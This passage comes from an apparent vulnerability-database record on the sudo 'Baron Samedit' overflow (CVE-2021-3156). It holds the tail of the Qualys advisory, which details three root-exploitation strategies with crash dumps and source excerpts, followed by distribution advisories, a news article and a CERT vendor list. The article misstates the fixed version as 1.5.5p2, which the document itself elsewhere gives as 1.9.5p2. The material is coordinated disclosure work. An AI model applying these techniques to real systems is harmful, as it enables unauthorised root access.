\n \nUnfortunately, this initial technique failed; our brute-forcer was able \nto overwrite the struct binding's dirname pointer: \n \n------------------------------------------------------------------------ \nProgram received signal SIGSEGV, Segmentation fault. \n \n0x00007f6e0dde1ea9 in __dcigettext (domainname=domainname@entry=0x7f6e0d9cc020 \"sudoers\", msgid1=msgid1@entry=0x7f6e0d9cc014 \"user NOT in sudoers\", msgid2=msgid2@entry=0x0, plural=plural@entry=0, n=n@entry=0, category=5) at dcigettext.c:619 \n \n=> 0x7f6e0dde1ea9 <__dcigettext+1257>: cmpb $0x2f,(%rax) \n \nrax 0x4141414141414141 4702111234474983745 \n------------------------------------------------------------------------ \n \nbut LC_MESSAGES was always the default \"C\" locale (not \"C.UTF-8\"), which \ndisables the string translation in gettext() (i.e., gettext() returns \nthe original format string, not our own). \n \nFortunately, however, our brute-forcer produced dozens of unique Sudo \ncrashes and gdb backtraces; among these, three caught our attention, and \nwe eventually exploited all three. \n \n \n======================================================================== \n1/ struct sudo_hook_entry overwrite \n======================================================================== \n \nThe first crash that caught our attention is: \n \n------------------------------------------------------------------------ \nProgram received signal SIGSEGV, Segmentation fault. 
\n \n0x000056291a25d502 in process_hooks_getenv (name=name@entry=0x7f4a6d7dc046 \"SYSTEMD_BYPASS_USERDB\", value=value@entry=0x7ffc595cc240) at ../../src/hooks.c:108 \n \n=> 0x56291a25d502 <process_hooks_getenv+82>: callq *0x8(%rbx) \n \nrbx 0x56291c1df2b0 94734565372592 \n \n0x56291c1df2b0: 0x4141414141414141 0x4141414141414141 \n------------------------------------------------------------------------ \n \nIncredibly, Sudo's function process_hooks_getenv() crashed (at line 108) \nbecause we directly overwrote a function pointer, getenv_fn (a member of \na heap-based struct sudo_hook_entry): \n \n------------------------------------------------------------------------ \n99 int \n100 process_hooks_getenv(const char *name, char **value) \n101 { \n102 struct sudo_hook_entry *hook; \n103 char *val = NULL; \n... \n107 SLIST_FOREACH(hook, &sudo_hook_getenv_list, entries) { \n108 rc = hook->u.getenv_fn(name, &val, hook->closure); \n------------------------------------------------------------------------ \n \nTo exploit this struct sudo_hook_entry overwrite, we note that: \n \n- the call to getenv_fn (at line 108) is compatible with a call to \nexecve(): \n \n. name (\"SYSTEMD_BYPASS_USERDB\") is compatible with execve()'s \npathname argument; \n \n. &val (a pointer to a NULL pointer) is compatible with execve()'s \nargv; \n \n. 
hook->closure (a NULL pointer) is compatible with execve()'s envp; \n \n- we can defeat ASLR by partially overwriting the function pointer \ngetenv_fn (which points to the function sudoers_hook_getenv() in the \nshared library sudoers.so); and luckily, the beginning of sudoers.so \ncontains a call to execve() (or execv()): \n \n------------------------------------------------------------------------ \n0000000000008a00 <execv@plt>: \n8a00: f3 0f 1e fa endbr64 \n8a04: f2 ff 25 65 55 05 00 bnd jmpq *0x55565(%rip) # 5df70 <execv@GLIBC_2.2.5> \n8a0b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1) \n------------------------------------------------------------------------ \n \n- we can read /dev/kmsg (dmesg) as an unprivileged user on Ubuntu, and \ntherefore obtain detailed information about our Sudo crashes. \n \nConsequently, we adopt the following strategy: \n \n- First, we brute-force the exploit parameters until we overwrite \ngetenv_fn with an invalid userland address (above 0x800000000000) -- \nuntil we observe a general protection fault at getenv_fn's call site: \n \n------------------------------------------------------------------------ \nsudoedit[15904] general protection fault ip:55e9b645b502 sp:7ffe53d6fa40 error:0 in sudo[55e9b644e000+1a000] \n^^^ \n------------------------------------------------------------------------ \n \n- Next, we reuse these exploit parameters but overwrite getenv_fn with a \nregular pattern of valid (below 0x800000000000) but unmapped userland \naddresses -- in this example, getenv_fn is the 22nd pointer that we \noverwrite (0x32 is '2', a part of our pattern): \n \n------------------------------------------------------------------------ \nsudoedit[15906]: segfault at 323230303030 ip 0000323230303030 sp 00007ffeeabf2868 error 14 in sudo[55b036c16000+5000] \n^^^^ \n------------------------------------------------------------------------ \n \n- Last, we partially overwrite getenv_fn (we overwrite its two least \nsignificant bytes with 0x8a00, 
execv()'s offset in sudoers.so, and its \nthird byte with 0x00, user_args's null terminator in set_cmnd()) until \nwe defeat ASLR -- we have a good chance of overwriting getenv_fn with \nthe address of execv() after 2^(3*8-12) = 2^12 = 4096 tries, thus \nexecuting our own binary, named \"SYSTEMD_BYPASS_USERDB\", as root. \n \nWe successfully tested this first exploit on Ubuntu 20.04. \n \n \n======================================================================== \n2/ struct service_user overwrite \n======================================================================== \n \nThe second crash that caught our attention is: \n \n------------------------------------------------------------------------ \nProgram received signal SIGSEGV, Segmentation fault. \n \n0x00007f6bf9c294ee in nss_load_library (ni=ni@entry=0x55cf1a1dd040) at nsswitch.c:344 \n \n=> 0x7f6bf9c294ee <nss_load_library+46>: cmpq $0x0,0x8(%rbx) \n \nrbx 0x41414141414141 18367622009667905 \n------------------------------------------------------------------------ \n \nThe glibc's function nss_load_library() crashed (at line 344) because we \noverwrote the pointer \"library\", a member of a heap-based struct \nservice_user: \n \n------------------------------------------------------------------------ \n327 static int \n328 nss_load_library (service_user *ni) \n329 { \n330 if (ni->library == NULL) \n331 { \n... \n338 ni->library = nss_new_service (service_table ?: &default_table, \n339 ni->name); \n... \n342 } \n343 \n344 if (ni->library->lib_handle == NULL) \n345 { \n346 /* Load the shared library. */ \n347 size_t shlen = (7 + strlen (ni->name) + 3 \n348 + strlen (__nss_shlib_revision) + 1); \n349 int saved_errno = errno; \n350 char shlib_name[shlen]; \n351 \n352 /* Construct shared object name. 
*/ \n353 __stpcpy (__stpcpy (__stpcpy (__stpcpy (shlib_name, \n354 \"libnss_\"), \n355 ni->name), \n356 \".so\"), \n357 __nss_shlib_revision); \n358 \n359 ni->library->lib_handle = __libc_dlopen (shlib_name); \n------------------------------------------------------------------------ \n \nWe can easily transform this struct service_user overwrite into an \narbitrary code execution: \n \n- we overwrite ni->library with a NULL pointer, to enter the block at \nlines 330-342, avoid the crash at line 344, and enter the block at \nlines 344-359; \n \n- we overwrite ni->name (an array of characters, initially \"systemd\") \nwith \"X/X\"; \n \n- lines 353-357 construct the name of a shared library \"libnss_X/X.so.2\" \n(instead of \"libnss_systemd.so.2\"); \n \n- at line 359, we load our own shared library \"libnss_X/X.so.2\" from the \ncurrent working directory and execute our _init() constructor as root. \n \nWe successfully tested this second exploit on Ubuntu 20.04, Debian 10, \nand Fedora 33. \n \n \n======================================================================== \n3/ def_timestampdir overwrite \n======================================================================== \n \nOur third exploit is not derived from one of Sudo's crashes, but from a \ncasual observation: during our brute-force, Sudo created dozens of new \ndirectories in our current working directory (AAAAAA, AAAAAAAAA, etc). \nEach of these directories belongs to root and contains only one small \nfile, named after our own user: Sudo's timestamp file -- we evidently \noverwrote def_timestampdir, the name of Sudo's timestamp directory. \n \nIf we overwrite def_timestampdir with the name of a directory that does \nnot already exist, then we can race against Sudo's ts_mkdirs(), create a \nsymlink to an arbitrary file, and: \n \n3a/ either chown() this arbitrary file to user root and group root; \n \n3b/ or open (or create) this arbitrary file as root, and write a struct \ntimestamp_entry to it. 
\n \nWe were unable to transform 3a/ into full root privileges (for example, \nif we chown() our own SUID binary to root, then the kernel automatically \nremoves our binary's SUID bit). If you, dear reader, find a solution to \nthis problem, please post it to the public oss-security mailing list! \n \nEventually, we were able to transform 3b/ into full root privileges, but \nwe initially faced two problems: \n \n- Sudo's timestamp_open() deletes our arbitrary symlink if the file it \npoints to is older than boot time. We were able to solve this first \nproblem by creating a very old timestamp file (from the Unix epoch), \nby waiting until timestamp_open() deletes it, and by racing against \ntimestamp_open() to create our final, arbitrary symlink. \n \n- We do not control the contents of the struct timestamp_entry that is \nwritten to the arbitrary file. To the best of our knowledge, we only \ncontrol three bytes (a process ID or a struct timespec), and we were \nunable to transform this three-byte write into full root privileges. \nIf you, dear reader, find a solution to this problem, please post it \nto the public oss-security mailing list! \n \nHowever, we were able to circumvent this second problem by abusing a \nminor bug in Sudo's timestamp_lock(). If we win the two races against \nts_mkdirs() and timestamp_open(), and if our arbitrary symlink points to \n/etc/passwd, then this file is opened as root, and: \n \n------------------------------------------------------------------------ \n65 struct timestamp_entry { \n66 unsigned short version; /* version number */ \n67 unsigned short size; /* entry size */ \n68 unsigned short type; /* TS_GLOBAL, TS_TTY, TS_PPID */ \n.. \n78 }; \n------------------------------------------------------------------------ \n305 static ssize_t \n306 ts_write(int fd, const char *fname, struct timestamp_entry *entry, off_t offset) \n307 { \n... \n318 nwritten = pwrite(fd, entry, entry->size, offset); \n... 
\n350 } \n------------------------------------------------------------------------ \n619 bool \n620 timestamp_lock(void *vcookie, struct passwd *pw) \n621 { \n622 struct ts_cookie *cookie = vcookie; \n623 struct timestamp_entry entry; \n... \n644 nread = read(cookie->fd, &entry, sizeof(entry)); \n645 if (nread == 0) { \n... \n652 } else if (entry.type != TS_LOCKEXCL) { \n... \n657 if (ts_write(cookie->fd, cookie->fname, &entry, 0) == -1) \n------------------------------------------------------------------------ \n \n- at line 644, the first 0x38 bytes of /etc/passwd (\"root:x:0:0:...\") \nare read into a stack-based struct timestamp_entry, entry; \n \n- at line 652, entry.type is 0x783a (\":x\"), not TS_LOCKEXCL; \n \n- at lines 657 and 318, entry->size bytes from the stack-based entry are \nwritten to /etc/passwd, but entry->size is actually 0x746f (\"ot\"), not \nsizeof(struct timestamp_entry). \n \nAs a result, we write the entire contents of Sudo's stack to /etc/passwd \n(including our command-line arguments and our environment variables): we \ninject an arbitrary user into /etc/passwd and therefore obtain full root \nprivileges. We successfully tested this third exploit on Ubuntu 20.04. \n \nNote: this minor bug in timestamp_lock() was fixed in January 2020 by \ncommit 586b418a, but this fix was not backported to legacy versions. \n \n \n======================================================================== \nAcknowledgments \n======================================================================== \n \nWe thank Todd C. Miller for his professionalism, quick response, and \nmeticulous attention to every detail in our report. We also thank the \nmembers of distros@openwall. \n \n \n======================================================================== \nTimeline \n======================================================================== \n \n2021-01-13: Advisory sent to Todd.Miller@sudo. \n \n2021-01-19: Advisory and patches sent to distros@openwall. 
\n \n2021-01-26: Coordinated Release Date (6:00 PM UTC). \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161160/QSA-CVE-2021-3156.txt"}], "debian": [{"lastseen": "2021-02-05T01:16:20", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2534-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Salvatore Bonaccorso\nJanuary 26, 2021 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : sudo\nVersion : 1.8.19p1-2.1+deb9u3\nCVE ID : CVE-2021-3156\n\nThe Qualys Research Labs discovered a heap-based buffer overflow\nvulnerability in sudo, a program designed to provide limited super user\nprivileges to specific users. 
Any local user (sudoers and non-sudoers)\ncan exploit this flaw for root privilege escalation.\n\nFor Debian 9 stretch, this problem has been fixed in version\n1.8.19p1-2.1+deb9u3.\n\nWe recommend that you upgrade your sudo packages.\n\nFor the detailed security status of sudo please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/sudo\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 2, "modified": "2021-01-26T18:36:34", "published": "2021-01-26T18:36:34", "id": "DEBIAN:DLA-2534-1:AA5E2", "href": "https://lists.debian.org/debian-lts-announce/2021/debian-lts-announce-202101/msg00022.html", "title": "[SECURITY] [DLA 2534-1] sudo security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-05T01:17:32", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4839-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJanuary 26, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : sudo\nCVE ID : CVE-2021-3156\n\nThe Qualys Research Labs discovered a heap-based buffer overflow\nvulnerability in sudo, a program designed to provide limited super user\nprivileges to specific users. 
Any local user (sudoers and non-sudoers)\ncan exploit this flaw for root privilege escalation.\n\nFor the stable distribution (buster), this problem has been fixed in\nversion 1.8.27-1+deb10u3.\n\nWe recommend that you upgrade your sudo packages.\n\nFor the detailed security status of sudo please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/sudo\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2021-01-26T18:05:52", "published": "2021-01-26T18:05:52", "id": "DEBIAN:DSA-4839-1:0839A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2021/msg00020.html", "title": "[SECURITY] [DSA 4839-1] sudo security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-01-27T20:12:29", "bulletinFamily": "info", "cvelist": ["CVE-2021-3156"], "description": "A doozy of a bug that could allow any local user on most Linux or Unix systems to gain root access has been uncovered \u2014 and it had been sitting there for a decade, researchers said.\n\nThe [bug was found in Sudo](<https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit>), a utility built into most Unix and Linux operating systems that lets a user without security privileges access and run a program with the credentials of another user. Qualys researchers named the vulnerability \u201cBaron Samedit,\u201d tracked as CVE-2021-3156. 
They said the bug popped into the Sudo code back in July 2011.\n\n\u201cQualys security researchers have been able to independently verify the vulnerability and develop multiple variants of exploit, and obtain full root privileges on [Ubuntu](<https://threatpost.com/billions-of-devices-impacted-secure-boot-bypass/157843/>) 20.04 (Sudo 1.8.31), Debian 10 (Sudo 1.8.27), and Fedora 33 (Sudo 1.9.2),\u201d the report said. \u201cOther operating systems and distributions are also likely to be exploitable.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe authors of Sudo have released a patched update, [Sudo version 1.5.5p2](<https://www.sudo.ws/alerts/unescape_overflow.html>).\n\n\u201cNot all Unix-like systems use the same implementation of Sudo, but this vulnerability is in the implementation distributed from <https://www.sudo.ws/sudo.html> (the Sudo main page) and is a widely used implementation,\u201d David A. Wheeler from the Linux Foundation told Threatpost.\n\nBut the news on the Sudo bug isn\u2019t all terrible.\n\n## **Locals Only: The Good News on the Sudo Bug**\n\n\u201cOne piece of good news: This is not remotely exploitable [without authentication],\u201d Wheeler added. \u201cAn attacker must already be able to run programs on the vulnerable computer before this vulnerability can be used.\u201d\n\nJerry Gamblin, director of security research at Kenna Security, agreed with Wheeler that while the bug is a dangerous vulnerability, the possibility for rampant attacks is low.\n\n\u201cIt is important to level-set that to exploit this vulnerability, a bad actor would need remote (SSH) or direct access to a vulnerable Linux machine,\u201d Gamblin told Threatpost. 
\u201cWhile it is a vulnerability that should be patched quickly, it does require a certain level of preexisting access, which makes widespread exploitation unlikely.\u201d\n\nThat said, malicious insiders or attackers who have achieved initial-stage access to a Linux environment are still perfectly capable of exploiting the issue. Linux botnets are also an attack vector. The recently discovered [FreakOut malware](<https://threatpost.com/linux-attack-freakout-malware/163137/>), for instance, targets Linux devices with specific products that have not been patched against various flaws. It adds compromised devices to a botnet that can then be used for multiple purposes, such as pushing additional malware or carrying out denial-of-service attacks. It also has brute-force abilities using hard-coded credentials to infect other network devices.\n\n\u201cI expect this CVE to have a CVSS score that falls in the range of 6 to 8. It is a local attack that requires low complexity and affects integrity and confidentiality,\u201d Gamblin said. 
\u201cThe risk for this vulnerability would be significantly higher if you offer terminal access to low privileged users, such as in an educational environment or an environment in which access is given to employees to run or monitor individual tasks.\u201d\n\n## **Sudo, a Double-Bug Perfect Storm **\n\nHere\u2019s how the vuln works: Specifically, the bug is a heap-based buffer overflow in Sudo, which lets any local user trick it into running in \u201cshell\u201d mode.\n\nSudo authors explained in a Tuesday advisory that when [Sudo is running in shell mode](<https://www.sudo.ws/alerts/unescape_overflow.html>), \u201cit escapes special characters in the command\u2019s arguments with a backslash.\u201d Then, a policy plug-in removes any escape characters before deciding on the Sudo user\u2019s permissions.\n\nBut it\u2019s not just a single bug which exposed these systems, it\u2019s actually the combination of two bugs working in tandem in Sudo that makes the exploitation possible, the authors explained.\n\n\u201cA bug in the code that removes the escape characters will read beyond the last character of a string if it ends with an unescaped backslash character,\u201d the Sudo authors explained. \u201cUnder normal circumstances, this bug would be harmless since Sudo has escaped all the backslashes in the command\u2019s arguments.\u201d\n\nBut another vuln, to which the CVE is assigned, was lurking in Sudo that made exploitation a threat.\n\n\u201cHowever, due to a different bug, this time in the command-line parsing code, it is possible to run \u201csudoedit\u201d with either the -s or -i options, setting a flag that indicates shell mode is enabled,\u201d according to the alert. \u201cBecause a command is not actually being run, Sudo does _not_ escape special characters. Finally, the code that decides whether to remove the escape characters did not check whether a command is actually being run, just that the shell flag is set. 
This inconsistency is what makes the bug exploitable.\u201d\n\n## **Linux/Unix Buffer Overflow **\n\nTechnically speaking, the vulnerable code overflows the heap-based buffer \u201cuser_args\u201d which gives attackers control over the size and contents of the overflow and allows them to change bytes in the overflow, according to Qualys.\n\n\u201cFor example, on an amd64 Linux, the following command allocates a 24-byte \u201cuser_args\u201d buffer (a 32-byte heap chunk) and overwrites the next chunk\u2019s size field with \u201cA=a\\0B=b\\0\u201d (0x00623d4200613d41), its fd field with \u201cC=c\\0D=d\\0\u201d (0x00643d4400633d43), and its bk field with \u201cE=e\\0F=f\\0\u2033 (0x00663d4600653d45):\u201d the report said.\n\nQualys researchers published a proof-of-concept (PoC) video:\n\nWheeler added that anyone running the system should implement the patched update as soon as possible.\n\n\u201cAnother piece of good news is that this is easily fixed and updated; fixing this shouldn\u2019t change how it works in the normal case,\u201d Wheeler added. \u201cSo you should immediately update to the fixed version.\u201d\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) _**Healthcare Security Woes Balloon in a Covid-Era World**_**, sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. 
Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** \u2013 on us!**\n", "modified": "2021-01-27T19:16:41", "published": "2021-01-27T19:16:41", "id": "THREATPOST:3A6A7F7256BF05AA048512CF2D064F7F", "href": "https://threatpost.com/sudo-bug-root-access-linux-2/163395/", "type": "threatpost", "title": "Sudo Bug Gives Root Access to Mass Numbers of Linux Systems", "cvss": {"score": 0.0, "vector": "NONE"}}], "freebsd": [{"lastseen": "2021-02-04T15:26:28", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "\nTodd C. Miller reports:\n\nWhen invoked as sudoedit, the same set of command line options\n\t are now accepted as for sudo -e. The -H and -P options are now\n\t rejected for sudoedit and sudo -e which matches the sudo 1.7\n\t behavior. This is part of the fix for CVE-2021-3156.\nFixed a potential buffer overflow when unescaping backslashes in\n\t the command's arguments. Normally, sudo escapes special characters\n\t when running a command via a shell (sudo -s or sudo -i). However,\n\t it was also possible to run sudoedit with the -s or -i flags in\n\t which case no escaping had actually been done, making a buffer\n\t overflow possible. 
This fixes CVE-2021-3156.\n\n", "edition": 2, "modified": "2021-01-26T00:00:00", "published": "2021-01-26T00:00:00", "id": "F3CF4B33-6013-11EB-9A0E-206A8A720317", "href": "https://vuxml.freebsd.org/freebsd/f3cf4b33-6013-11eb-9a0e-206a8a720317.html", "title": "sudo -- Multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2021-02-04T14:44:47", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "**CentOS Errata and Security Advisory** CESA-2021:0221\n\n\nThe sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2021-January/048252.html\n\n**Affected packages:**\nsudo\nsudo-devel\n\n**Upstream details at:**\n", "edition": 2, "modified": "2021-01-27T00:11:23", "published": "2021-01-27T00:11:23", "id": "CESA-2021:0221", "href": "http://lists.centos.org/pipermail/centos-announce/2021-January/048252.html", "title": "sudo security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2021-02-04T12:34:26", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "Sudo (superuser do) allows a system administrator to give certain users (or groups of users) the ability to run some (or all) commands as root while logging all commands and arguments. Sudo operates on a per-command basis. It is not a replacement for the shell. 
Features include: the ability to restrict what commands a user may run on a per-host basis, copious logging of each command (providing a clear audit trail of who did what), a configurable timeout of the sudo command, and the ability to use the same configuration file (sudoers) on many different machines. ", "modified": "2021-01-27T04:12:23", "published": "2021-01-27T04:12:23", "id": "FEDORA:60E3A30D1484", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: sudo-1.9.5p2-1.fc32", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T12:34:26", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "Sudo (superuser do) allows a system administrator to give certain users (or groups of users) the ability to run some (or all) commands as root while logging all commands and arguments. Sudo operates on a per-command basis. It is not a replacement for the shell. Features include: the ability to restrict what commands a user may run on a per-host basis, copious logging of each command (providing a clear audit trail of who did what), a configurable timeout of the sudo command, and the ability to use the same configuration file (sudoers) on many different machines. 
", "modified": "2021-01-27T01:19:48", "published": "2021-01-27T01:19:48", "id": "FEDORA:353D73154ABE", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: sudo-1.9.5p2-1.fc33", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2021-02-24T14:45:11", "bulletinFamily": "info", "cvelist": ["CVE-2021-3156"], "description": "### Overview\n\nA heap-based overflow has been discovered in sudo, which may allow a local attacker to execute commands with elevated administrator privileges.\n\n### Description\n\nFrom the [Sudo Main Page](<https://sudo.ws>):\n\n> Sudo (su \"do\") allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\n\nIt is possible for a local Non-administrative user to exploit this vulnerability to elevate their privileges so that they can execute commands with administrator privileges. The team at [Qualys](<https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit>) assigned this vulnerability CVE-2021-3156 and found multiple *nix operating systems were vulnerable, including Fedora, Debian, and Ubuntu. A blog update from February 3, 2021, reports that macOS, AIX, and Solaris may be vulnerable, but Qualys had not yet confirmed this. There is [additional reporting](<https://www.zdnet.com/article/recent-root-giving-sudo-bug-also-impacts-macos/>) that other operating systems are affected, including Apple\u2019s Big Sur.\n\n### Impact\n\nIf an attacker has local access to an affected machine then it is possible for them to execute commands with administrator privileges.\n\n### Solution\n\n**Apply an Update**\n\nUpdate sudo to the latest version to address this vulnerability when operationally feasible. This issue is resolved in sudo version 1.9.5p2. 
Please install this version, or a version from your distribution that has the fix applied to it\n\n### Acknowledgements\n\nThis vulnerability was researched and reported by the Qualys Research Team.\n\nThis document was written by Timur Snoke.\n\n### Vendor Information \n\n794544\n\n### Cisco __ Affected\n\nNotified: 2021-02-15 Updated: 2021-02-15\n\n**Statement Date: February 15, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nCisco is tracking this vulnerability via incident PSIRT-0750174077 .\n\nCisco has published a customer facing advisory here: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sudo-privesc-jan2021-qnYQfcM\n\nit's in interim status and gets update regularly as our investigation of the product base progresses.\n\n#### References\n\n * <https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sudo-privesc-jan2021-qnYQfcM>\n\n### Debian GNU/Linux __ Affected\n\nUpdated: 2021-02-04\n\n**Statement Date: January 26, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.debian.org/security/2021/dsa-4839>\n\n### F5 Networks Inc. 
__ Affected\n\nNotified: 2021-02-04 Updated: 2021-02-05\n\n**Statement Date: February 05, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nF5 BIG-IP and BIG-IQ products are NOT VULNERABLE to CVE-2021-3156.\n\nF5 Traffix SDC is vulnerable.\n\nPlease see [K86488846: Sudo vulnerability CVE-2021-3156](<https://support.f5.com/csp/article/K86488846>) for more information.\n\n#### References\n\n * <https://support.f5.com/csp/article/K86488846>\n\n### Fedora Project __ Affected\n\nUpdated: 2021-02-04\n\n**Statement Date: January 26, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://access.redhat.com/errata/RHSA-2021:0218?language=en>\n * <https://access.redhat.com/errata/RHSA-2021:0219?language=en>\n * <https://access.redhat.com/errata/RHSA-2021:0220?language=en>\n * <https://access.redhat.com/errata/RHSA-2021:0221?language=en>\n * <https://access.redhat.com/errata/RHSA-2021:0222?language=en>\n\n### Gentoo Linux __ Affected\n\nUpdated: 2021-02-04\n\n**Statement Date: January 26, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://security.gentoo.org/glsa/202101-33>\n\n### HardenedBSD __ Affected\n\nNotified: 2021-02-04 Updated: 2021-02-05\n\n**Statement Date: February 04, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nHardenedBSD's sudo port has been updated and can be used to mitigate affected systems. 
Systems that have updated their sudo port/package are no longer vulnerable.\n\n#### References\n\n * <https://github.com/HardenedBSD/hardenedbsd-ports/commits/master/security/sudo>\n\n### Joyent __ Affected\n\nNotified: 2021-02-04 Updated: 2021-02-10\n\n**Statement Date: February 10, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nSmartOS gets its sudo binary from pkgsrc(1). pkgsrc's main feed has updated sudo binaries, and one merely need `pkgin upgrade` in any affected SmartOS zone to get the fixed version.\n\n### NetApp __ Affected\n\nUpdated: 2021-02-04\n\n**Statement Date: February 03, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://security.netapp.com/advisory/ntap-20210128-0002/>\n\n### Openwall GNU/*/Linux __ Affected\n\nUpdated: 2021-02-04\n\n**Statement Date: January 26, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.openwall.com/lists/oss-security/2021/01/26/3>\n\n### Oracle Corporation __ Affected\n\nUpdated: 2021-02-04\n\n**Statement Date: January 27, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.tenable.com/plugins/nessus/145461>\n * <https://linux.oracle.com/errata/ELSA-2021-0221.html>\n * <https://linux.oracle.com/errata/ELSA-2021-0218.html>\n * <https://linux.oracle.com/errata/ELSA-2021-9019.html>\n\n### Red Hat __ Affected\n\nUpdated: 2021-02-04\n\n**Statement Date: January 26, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://access.redhat.com/node/5738141>\n * <https://access.redhat.com/errata/RHSA-2021:0218?language=en>\n * 
<https://access.redhat.com/errata/RHSA-2021:0219?language=en>\n * <https://access.redhat.com/errata/RHSA-2021:0220?language=en>\n * <https://access.redhat.com/errata/RHSA-2021:0221?language=en>\n * <https://access.redhat.com/errata/RHSA-2021:0222?language=en>\n * <https://access.redhat.com/errata/RHSA-2021:0223?language=en>\n * <https://access.redhat.com/errata/RHSA-2021:0227?language=en>\n\n### SUSE Linux __ Affected\n\nNotified: 2021-02-04 Updated: 2021-02-05\n\n**Statement Date: February 05, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nSUSE has already provided fixes for the affected supported products. Users should patch their systems. SUSE Linux Enterprise Server 12 and SUSE Linux Enterprise Server 15 products are affected. SUSE Linux Enterprise Server 11 products are not affected.\n\n#### References\n\n * <https://www.suse.com/de-de/support/kb/doc/?id=000019841>\n * <https://www.suse.com/security/cve/CVE-2021-3156/>\n * <https://bugzilla.suse.com/show_bug.cgi?id=1181090>\n\n### Synology __ Affected\n\nNotified: 2021-02-04 Updated: 2021-02-24\n\n**Statement Date: February 23, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.synology.com/zh-tw/security/advisory/Synology_SA_21_02>\n\n### Ubuntu __ Affected\n\nUpdated: 2021-02-04\n\n**Statement Date: January 26, 